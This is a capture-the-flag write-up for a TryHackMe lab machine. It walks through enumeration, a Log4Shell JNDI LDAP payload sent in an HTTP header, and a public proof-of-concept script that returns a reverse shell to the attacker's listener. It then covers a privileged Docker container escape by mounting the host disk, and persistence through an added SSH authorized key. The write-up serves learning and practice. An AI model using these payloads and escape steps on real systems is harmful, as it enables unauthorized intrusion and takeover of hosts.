Lumberjack Turtle(Medium)-THM writeup

Rahul Kumar
Mar 3, 2022
2 min read

Updated: Mar 10, 2022

Reconnaissance

let's start with Nmap scan

nmap -sC -sV -oA nmap/log4j 10.10.43.2

we got 2 ports open 80 and 22.

Enumeration

on the home page, we have

fuzzing the directories with wfuzz

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt — hc 404 http://10.10.43.2/FUZZ

we got 2 hits for directories

go to ~logs page

it tells to do a deep search

so started another directory search

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt — hc 404 http://10.10.43.2/~logs/FUZZ

the directory name is after a popular log4j exploit so let's try to exploit it

Exploitation

start an NC listener for testing

start burp and intercept the request.

I send the payload in accepting header

${jndi:ldap://<ip>:<port>/a}

we got a response, so it's vulnerable

I use this git repo for log4shell - https://github.com/kozmer/log4j-shell-poc

clone the repo install the requirements

pip install -r requirements.txt

also, you need to have java-8u20 in the cloned directory as guided in the repo

download the tar file after making an account on site

extract the tar file and move the content in the cloned repo directory

rename the directory to “jdk1.8.0.20”

./poc.py — userip 10.9.3.37 — webport 8000 — lport 1234

start an NC listener on the port you specified in the command (from the above command 1234)

send the payload given by the script is accept header you will get a connection back

we get a shell

Privilege Escalation

now let’s get our first flag

find / | grep “flag”

this will give flag location

after getting the shell I enumerate the environment. through linpeas, I found that I was in a container with --privileged flag enabled.

Inside docker check (MANUALLY)

But I want to learn to do find this manual so I did research fount his article

https://tuhrig.de/how-to-know-you-are-inside-a-docker-container/

cat the /proc/[]/cgroup in a normal machine it doesn't contain any docker in the file in this env we a dockers entry so this tell that we are in docker env.

--privileged Flag Enabled Check (Manually)

found this article

it tells that if you can run

ip link add dummy0 type dummy

if this command runs on the docker without error then the flag is enabled.

https://stackoverflow.com/questions/32144575/how-to-know-if-a-docker-container-is-running-in-privileged-mode

Docker container Escape

from the blog below I got that containers with the privilege flag set can mount host storage.

https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

we can see mountable disk from the following command

mount -l
fdisk -l

we can see that /dev/xvdf is mountable

so we mount it

mount <storage> <destination>

get the root.txt file in the root directory of the mountable disk

it till to “look harder”

there … directory that contains the flag

ROOT SHELL

to get the root shell on the system create an ssh key pair on your machine

ssh-keygen

write the id_rsa.pub(public key) key data to the .shh folder in the auhorized_key file

then log in with the id_ras key (private key)

Conclusion

This was a nice machine to exploit, especially to teach about dockers misconfiguration and log4j vulnerabilities.

That’s it! Hope you learned something from this write-up! Thanks for reading! 👍